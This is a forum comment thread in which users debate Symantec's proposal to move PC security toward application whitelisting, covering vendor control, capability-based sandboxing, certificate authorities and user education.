Just as in Trusted Computing -- which, of course, is the only viable method for enforcing restricitons necessary for such a whitelist -- this makes computers not the personal tools of the individuals who own them but instead the slave nodes of whatever entities currently hold power in the industry. What a wonderful scenario. All for the price of malware reduction (just don't install the damn screensaver people!), we're willing to turn our general purpose computers into hunks of plastic just as dumb as the iPhone.
I, for one, don't want to buy $2000 desktop iPhones at gunpoint just to browse the web.
To be honest, with the current state the eletronic mailing is now, I'd like all the major mailers to have a whitelist of digitally signed domains whose e-mails shall accepted, and whose accounts should be uncompromised.
I know it's extreme, techinically impossible to implement and will piss off millions, specially domain owners, but spamming, and phishing and all sorts of internet crime attacks do play a major role in the worldwide modern economy.
After one flippant response I am now thinking this is a VERY reactive measure, similar to a triage after a disaster, so what Symantic is saying is Windows is such a mess that we can't rely on patches to the OS anymore, and we have to set up an OS 'police state' to keep bad programs out because we don't have the adequate resources or skills to detect or prevent bad stuff from happening inside. So instead of deploying your systems in a productive environments you would be just managing a disaster area.
As I posted in the other response I could see this easily become an opportunity for MS to get on a "Witelist Committee" to make sure their stuff is approved and any competition is either barred, hobbled, or severely delayed from approval to the whitelist (with OSS software being automatically labeled as a potential threat as the code can be modified and recompiled by anyone).
All and more, because MS either is unable or unwilling to secure Windows to similar to what Linux and OS X have.
"Enjoy what you're doing! If it becomes drudgery, you're doing it wrong!" - Jim Butterfield
What if I like reverse-engineering malware? What if I write my own code? What if I don't want to trust programs trusted by other people?
White-listing must be in the hands of the individual. You might be interested in this - Disk Firewall with application verification. It does not control the whole OS, but with this tool you can protect your sensitive data from being accessed by malware.
I think this can has a similarity with SELinux - you define which programs are allowed to use certain resources, and everything else is prohibited for them.
If I can't add a program to the whitelist myself, I don't want it.
All it will take is for one rogue program to rewrite the whitelist. So the whitelist is at symantic's site? Great, what happens when Symantic is hacked? How do you get your computer to work when your internet connection is down?
Far better would be giving your programs and libraries human readable names! Right now I'm in windows at work, Windows' task list lists "Internet Security Moving Toward 'White List'" as a program, instead of Intenet Explorer. So you Windows users will all have to downgrade from XP to Vista. Access is also running, it's called... OK it's called the name of an application I wrote. Windows Explorer is named after the folder it's showing.
Processes are all non-readable gobbledygook; shstat.exe, dpmw32.exe, etc. A few you can figure out, but most are ciphers. Windows hasn't had the 8.3 limitation in well over a decade now, why in the hell aren't DLLs given English names? I can't stop a process if I don't know what it's for, or I may hose the whole system and cause a cold boot.
If Symantic serves the whitelist, how in the hell are you supposed to write your own programs?
What's to stop me from writing a virus called IE.exe?
And finally, when did they start smoking crack at symantic?
-mcgrew (not the mcgrew from McGrew Security)
Exactly. It is a falacy to think that a whitelist is less trouble than a blacklist. At the rate that MS machines get screwed up, the whitelist will never be up to date and being a 'good' list, a wrong entry in a whitelist is much more damaging than a wrong entry in a blacklist.
A blacklist fails safe.
A whitelist fails with tragic consequences.
Excuse me, but please get off my Pennisetum Clandestinum, eh!
Sorry, I'm not apt to trust anything said by a rep of the company that makes the abomination known as Norton Internet Security. NIS itself should be classed as a virus!
2017, The Free Republic of the Founding Fathers, The Free Capital City: The President today announced the formation of the Whitelist Committee. After years of deliberations, the criminologists decided that the blacklist approach to security is not effective. Instead of catching criminals after they committed a crime (the blacklist approach), the government will now analyse the brains of newborn babies and have the Whitelist Committe decide whether they deserve to live. If chemicals associated with aggressiveness, eg testosterone, are found in larger than allowed quantities, then these babies are going to be killed to save the society from having to catch them when they commit a crime. Babies that are found to have tolerable testosterone levels will be tagged with an RFID implant for life and be allowed to live in our wonderful society. To guarantee against misidentifications, the Whitelist Committe will also put another implant in the baby's heart that will allow the government to remotely stop the heart of any person who was allowed to live by mistake. This, the president announced, is going to lower the costs of the corrections system, so that more funds can be directed to the never-ending War on Thought.
To distillate: When you implement a whitelist, the people who have control over it become your absolute masters. You must be very careful with whitelists, because if they are mismanaged or used for reasons other than security then you end up screwed.
I try to follow the money.
I understand why the Symantec shill said what he said, and that is understandable.
A white list on my machine I control is one thing.
A white list controlled by Symantec is something I wouldn't touch with a 10 foot pole, let alone load.
While they seem to be talking about client-side stuff in TFA, I think the title is a little misleading. Internet security is already a whitelist, since SSL certs are basically a whitelist. TFA is talking about PC security in general.
Self-referential Sigs are cool on /. these days...
54
I've been using a whitelist system for email for over two years and I love it. Though I don't know how that will work for everything else.
This just isn't right, at all!
White-lists only work for smaller things, such as trusted websites, but white-listing programs?
What about the countless in-house network programs people create, or little things to help users post on their favorite forum, programs to check your mail and so on, this would be totally unfair to them!
The only way this could possibly work would be to white-list programs, and disallow everything else by default, but ASK you if you would want to run it, and possibly even allow a scan of the program be sent back to them so they can check it and verify it and add it to their white-list if alls okay with it.
But even then, this is still nuts, its web browser vendors (yes, EVEN Mozilla, who seem to be placed on a golden pedestal in "everyones" head) and Microsoft who are at fault for not taking necessary precautions for those who don't know much about computers.
For one, having extensions hidden by default was the most idiotic thing Microsoft have EVER done, even worse than ActiveX, even worse than IEs mangled understanding of web standards.
Holy crap, whats with this captcha?! http://images.slashdot.org/hc/49/bdb4db85edef.jpg
The white-listing idea is just like Capabilities. That's the sort of security users really need. Security with Capabilities can be mathematically provable.
You, the average /. reader already has a whitelist of sorts. At least informally. Do you install everything that is potientially executable on a computer? No? I'd say you are using a whitelist then.
OK, moving on to Grandma or Aunt Sally. How the heck are they supposed to tell the difference between an application written by Microsoft and one written by the Russian Mob(tm)? One is a instant messenger tool that communicates with the world, the other is an instant messenger tool that also steals passwords. Assuming equal external functionality, who is to say one is good and one is bad?
At the "user" level without a knowledgable administrator, something like this has to be done. It has nothing to do with security - because if you leave the security decisions to a user that doesn't know the difference, bad decisions will be made. And once you install a compromised application it is over - you have no security.
Sure, in a properly-sandboxed environment it might be possible to limit the damage from such an application. But, even on Linux there are applications that must be given authorization beyond that of an ordinary user. How would Aunt Sally figure out that this application asking for increased authorization should not get it? Who does she call to ask if this is a "good" application or a "bad" application?
The clear answer is that for the bulk of the personal computer user community there must be an administrator of last resort. And a whitelist of applications would certainly fulfill that requirement.
The only question is how many hoops does one have to jump through to get their application on the list?
Let's say we have very strong white listing enabled and each executable program must be signed by three independent third parties or it can't run. Say I'm a virus writter. So what do I do to get around this? Easy. I place a timer in my code so that it acts nice for 6 months but when the time comes it trashes your system. A "time bomb" will pass white listing un-noticed There is only one way to counter this: Open Source. The people who sign off the code need to be able to inspect it line by line. and they need to inspect any linked in libraries (DLLs) line by line and the compiler too. Only after careful inspection can they know there is no time bomb. Even then they can't be 100% sure because they might be hidden. In fact hiding it even in open source would be easy. So what to do? Go back to your Computer Science 101 class and re-read the text book. Basically the OS should never grant more privilege to a program than it needs. Do this at the finest level of granularity you can and that's it. So, for example, a word processor should not be allowed to alter any file except a text document that is marked as "writable" by the user running the word processor. There are al kinds of way in do this but the basic rule is to restrict what a program can do. The problem with Windows is the granularity to to big, that and that most dumb user run with an admin account
The whole argument about needing stuff like
Have gnu, will travel.
According to Marcus Ranum, "world-renowned expert on security system design and implementation" and "an early innovator in firewall technology, and the implementor of the first commercial firewall product" (http://www.ranum.com/stock_content/about.html), white-listing was the way it should have been done since the start. In fact, black-listing (or as he calls it, "default permit") is at the top of his "The Six Dumbest Ideas in Computer Security" list (http://www.ranum.com/security/computer_security/editorials/dumb/).
It really isn't a matter of preference. It's a nod to the fact that viruses can mutate at lightening speed, and that there is a huge number of malware to be added to software.
Trying to ban software once it is found to be corrupted is a losing game eventually. You can never get the first couple of instances unless they end up being downloaded first by researchers, and then there are a few that get installed before they have been discovered.
With a whitelist approach, it becomes much more difficult to sneak one by the systems as they would have to get approval from somebody to run. A proper system would allow for the user to click through to install it anyway if they were sure that the software was legit. Preferably having the system do some sort of signature check for approved software first.
Yes it is a bit cumbersome, but it isn't anywhere near so as individually banning each program that becomes infected.
Speaking very generally, whitelists are an excellent way to go, and blacklists are impossible (read point #2).
The trick with whitelists, of course, is who maintains them and how. I'll bet the thought of the software using a single whitelist published exclusively by Symantec, is making a lot of small developers nervous.
I recommend some kind of distributed reputation system, possibly based on an OpenPGP WoT model (yeah, I always pimp the OpenPGP WoT; I must sound like a broken record) where many people can publish lists. (And if Symantec wants to ship the product set to just use their list by default with 100% trust, that's ok. Although it might be neat to have it, say, trust Debian's list too. :-) Then let the user decides who he trusts and how much he trusts each one, and if something isn't on the list or its trust is below some user-set threshold, then he gets a prompt explaining the situation, and asking what to do about it.
Yes, that prompt will confuse some people. I hear lots of horror stories about Vista being hard-to-use because of these types of things. But if the alternative is executing Malware...
But people still need to stop using applications that easily execute foreign code. There's no excuse in 2007 for clicking on a link in a web browser, or clicking an attachment in an email, being a potentially dangerous action. The AV companies shouldn't still be in business in the first place, and the whole premise behind scanning executables against a blacklist or whitelist, is that something has already gone terribly, terribly wrong.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
But something like:
---
I see that this is executable content from someone you have no trust relation with. Please DON'T run this: OK Continue.
You have continued, and possibly don't understand the implications of your actions. I will save the program to disk, and you will have to open a command line, and execute it manually. Save Cancel Continue
So you really want to run this program. We will first download the program, quarantine it, install or update your virus and trojan checker after the quarantine period (default is 1 week), check the software and then (if it passes), run it. Would you like to continue? Cancel Continue
Software has been quarantined. You will be reminded next week.
---
I believe that should work for most computer users I know.
Just another "Cubible(sic) Joe" 2 17 3061
Essentially your post distills down to "People who 'knew' assumed that the great unwashed masses were essentially stupid and lazy. It is not called "dumbing down" without reason. Note that the assumptions I am about to talk about are not ascribed to you, but we the industry as a whole.
People are too stupid to understand SSL so we dumb it down to a padlock.
People are too stupid to understand public and private key encryption so we don't use it.
People are too stupid to understand how to write in plain text, so we need HTML mail to put pretty colors and backgrounds on it.
People are too stupid to understand how or are too lazy to copy and paste URLs from email so we need to make emails convert URLs to clickable links. Same thing for attaching content.
People are too stupid to know what filenames are so we dumb it down to not show extensions.
People are too stupid or lazy to save an attachment and then execute so we make it automatically happen.
All these assumptions and more are fundamentally flawed as well as largely responsible for the so-called internet security problem described above. How many problems are do to the "honor virus" (do this and this and this, delete this)? How many emails go out from admins saying "this is infected, don't open the attachment" followed by a flood of that attachment telling the admin who did in fact open it? Far too many. Why is it?
It is because of the assumption that users are dumb/lazy, and that they should bear no responsibility for learning things. Part of it is a side-effect of government school structure - it creates an atmosphere that learning is a school thing, not an everyday thing. Part of it is elitism, mixed with a part of "let's take pity on people and not make them learn things". An odd and dangerous combination.
Symantec and it's ilk are essentially a form of police force. Allegedly there for your protection, but ultimately when the mugger sticks a knife or gun in your face, it is you who is responsible for defending or protecting yourself. A "whitelist" or "list of applications we approve of or were paid to allow" is essentially throwing in the towel.
If this were applied elsewhere, what would the implications and effects be?
Instead of a no-fly list we'd have a "can fly" list.
Somehow that doesn't seem right. Neither does an "approved to run" list. Before someone compares this to port "default deny" or login "default deny", consider this analogy.
You determine who you allow in your house. This is like blocking ports.
Now imagine someone else telling you you can allow in or not. This is "Symantec et al. moves to a whitelist". Well what i you can add people? Ok, but if you are not smart enough to decide on your own who to allow in, how the hell can you be trusted to add people to the list they provide?
To bring that back, can the user add applications to the Symantec approved list? If so, how long before the email telling people "do this then this then this" comes out where the first steps are to add their app to the whitelist? How long before that becomes scriptable?
Ultimately the problem lies in poor assumptions. Assumptions based on the end user being a lesser being, and assumptions that "things will be ok" or that others will step in and protect bad code.
Technology is increasingly becoming more complex. If society does not adapt and learn with it, we are doomed to be felled by it in some fashion. The rampant abuse of the above assumptions and the resulting damage is almost a hidden result. We don't want to have to train users, so we dumb down software to make it "easy". The result? Instead we spend that money on billions and billions of dollars on software to make up for the problems of dumbing things down, and making them "so easy".
And we still spend billions of dollars a year on training for that allegedly easy to use, intuitive, and simple software that causes so much additional work, insecurity, and damage.
IMO we need to understand that the only intuit
My Suburban burns less gasoline than your Prius.
I've been saying this for years. It makes perfect sense. The number of applications you want to run on your computer is next to nothing compared to the hundreds of thousands of spyware, virus, bots, and every other undesirable program out there. One step closer to "hack proof" if you ask me (not that we can ever make something 100% hack proof).
~Vexed and loving it!
Whitelisting an entire app is too coarse-grained. We need to be able to whitelist the actions that a specific app can take. For example... by default, microsoft word should only have read-only access to its own files and library files needed to run. It should have no net access whatsoever. It should have no access to any of my personal data files. It should have no access to my keyboard when I'm typing in another app. It should have no access to drawing on any portion of my screen outside its own window. It should have no way to spoof another app's name in the window titlebar. It should only have read/write access to the single file that I click "open" on to edit.
Since I have to choose the files I want to work with in a file open dialog anyway, we force microsoft word to use a system-wide, trusted file open dialog which is the only way to grant it access to more files.
See http://plash.beasts.org/ and http://www.eros-os.org/essays/capintro.html
I develop small applications for myself and my company on nearly a weekly baises. Most of these apps just do some minor repetitive operation. Is Symantec suggesting that I need their approval before running my own code?
.Net? In many cases it's the VM that's actually running.
How would something like this apply to byte code like Java or
The only workable solution I can see is having some dialog box that pops up asking the user to whitelist some application -- and we know how well asking the user to make an informed decision works.
- I voted for Nintendo and against Bush
This is a silly idea. I do not believe it could never work well for developers, although it might be okay for certain "mainstream" home users, who will never use anything that is not bundled or off-the-shelf.
The fairness aspect is a good point. Whose programs get tested? There are far too many coming out every day to test them all... there are far more "whitelist" programs than there will ever be "blacklist" programs. So what is really gained here?
Developers in particular are constantly trying new things (and I mean NEW as in "yesterday"), and could not possibly wait for all their tools and scripts to go through an arduous "whitelist" test before use... assuming they ever made it too the testing phase.
No, pardon me, but this idea is far too similar to the bizarre idea of testing every citizen thoroughly to make sure they are NOT a criminal, before they are allowed to drive or get a job. That simply would not work... there are too many people, and most of them are not criminals. Same with this idea. Won't work in practice. The whitelist would have to be vastly larger than any blacklist that will ever be built.
The point of certificates is that you are supposed to be paying attention to the domain.com address you are connecting to in the first place, not blindly trusting wherever the links take you. But many people these days do not even know what the address bar is for: they type "www.yahoo.com" into MSN search field, and consider the address field to be gibberish because no one introduced them to it.
Certificates mean that you can tell the "etrade.com" you are trying to reach is real, with no hijacked address or MITM eavesdropping. That is all.
And that is all that's necessary IF you pay attention to the domains that appear in your address bar. Implicitly trusting everyone with a certificate isn't necessary; all the certificate means is that the DOMAIN is what it says.
Beyond that, you still have to be discerning in which addresses you decide to connect with.
This is a much more insightful comment than appears on the surface.
Windows is the standard-bearer of personal computing culture. That being the set of expectations that allow people to buy their own computer, then add 3rd-party drivers and applications at will. (And yes, I know that Apple had that basic formula before MS.) Without the PC business model, what we are left with is a mainframe culture: Central authority decides what you can run.
The PC plays a critical role in electronic freedom, and Windows' poor engineering (among other factors) is putting it all in jeopardy. If the Desktop Linux people get a clue, we can step in and fill the gap. But it will have to involve more than selling the idea of glorified thin clients.
employing that 'philosophy' and advise everyone and my clients against that.
first of all, harmful programs are much less in number than beneficial programs. so its just stupid to hoard long lists of 'whitelisted' programs, taking up space, and eventually memory, processing power, unless there is a motive behind that.
the only motive i can see is that symantec wants to cash in on the payments of software companies that would want their programs put on that whitelist.
we have so many robbers around in the email spam filter scene employing similar schemes, and i personally wont tolerate another wise-ass move bringing the same crap to software world.
just ditch it symantec. it will harm you. ah, also fire whomever idiot came up with that 'bright' idea.
Read radical news here
whitelist, blacklist, whatever. Their products are always going to be horrible. Norton internet security is the "vista" of internet security. With all PC that run Norton all I've seen is massive slowdown. It's gotten to the point where I literally cringe whenever I see that yellow "Norton" in the taskbar right next to the system tray. this is the main reason why I don't use any anti-virus/internet security programs anyway. They are VERY resource hungry and it's rather pointless, because I have enough experience to know what is malicious and what isn't. ok, and before I get replies saying "switch to Linux," I plan to right when I build my new PC.
Uhm, so basically what they are saying is that one shoudl only run code from sources you trust? Gee, I would never have thought of that... The problem with web-pages and scripts and applets is that you sometimes want to run un-trusted code with limited privileges. That is solved by privilege separation and making sure your interpreter / virtual machine is free from vulnerabilities and won't leak sensitive data. Have guess which bit is the tricky part...
Whitelisting works for consoles. ;) I think whitelisting will work for computing devices that aren't meant to be used as high-powered general-purpose comptuers; or for devices that could be a serious target.
For example, I might stick a device on my nightstand JUST for web browsing. Being whitelist-driven, I don't have to worry about babysitting it like I babysit my Macs and Wintels.
No, I will not work for your startup
Will a new whitelist technology be more secure than what exists now? That has entirely to do with how it is implemented and used. If the whitelisting software has flaws, it will exploited. And if the end user has any input at all, they can still make bad decisions.
One can imagine a series of white lists stacked on top of each other, allowing one to allow one to allow one to allow one to allow some code to run. Has security been increased? Isn't the general thought that the more links in a chain, the more likely there is to be a weak one?
Build a man a fire, he's warm for one night. Set him on fire, and he's warm for the rest of his life.
Let me admit something:
Even while extolling the virtues of SSL certificate authorities here, I am also newly aware of a potential problem... a betrayal of sorts. VeriSign has 60% of the CA market and doubtless hold most of the keys. They have also entered a new market that 'synergizes' with their existing one: VeriSign is now "lawful intercept" subcontractor. Under the expanded scope of CALEA, they spy on both voice and data communications for the FBI and NSA. In the case of purely USA-domestic links, they presumably act only on a court warrant, but where any hint of the international is involved (very easy to construe on the Internet) there isn't even a need for a warrant.
VeriSign are capitalizing on what seems to be their unique ability to stage MITM attacks undetected.
I don't mind recommending certs in response to a topic about the explosion of garden-variety Internet crime. But there is that ultimate question of privacy to contend with; of countering widespread government surveillance.
Community-organized CAs could perhaps gain trust through PGP signing, for what are otherwise normal SSL CA services. Major Linux distros could start CAs based on their considerable PGP signing histories, since they already use public key identification for their repositories.
Perhaps the OS that was developed over the Internet could end up saving it.
Just a thought...
HP Labs hacked some sandboxing into Windows (PDF, sorry) including a few capability-based ideas, e.g. the only way for an application to write outside its temp directory is if the user grants a capability implicitly via the open file dialog.
Ah, but if you can set up a system where us /.ers allowing or blocking an application updates the whitelist. You can set up some kind of web of trust for the clueless among the internet population to rely on.
09F91102 no, 455FE104 nope, F190A1E8 uh-uh, 7A5F8A09 that's not it, C87294CE no. Ah! 452F6E403CDF10714E41DFAA257D313F.
Have you ever seen an 11-year old deal with security warnings? It goes like this: Yes / OK / Geez this is stupid / Sure / Why not / I just want to play "frogger!"
I find it deeply disturbing that after reading the 59 comments available at threshold 2, I haven't seen any that demonstrate the slightest familiarity with how a HIPS program works.
Your IT administrator sets the whitelist by using learn mode, not Symantec.
"Nothing was broken, and it's been fixed." -- Jon Carroll
Didn't slashdot just recently do this exact same story? This fits in with DRM, here choose from this list of approved things to do with your computer and nothing else.
Their competition have been working on this idea for a while with Symbian Signed and Nokia Mosh
Why can't we call it an authorized or approved list? If it is bad, call it an unapproved list.
Darn, another e-mail from Nigeria about another dead relative.... Let me add him to the black list.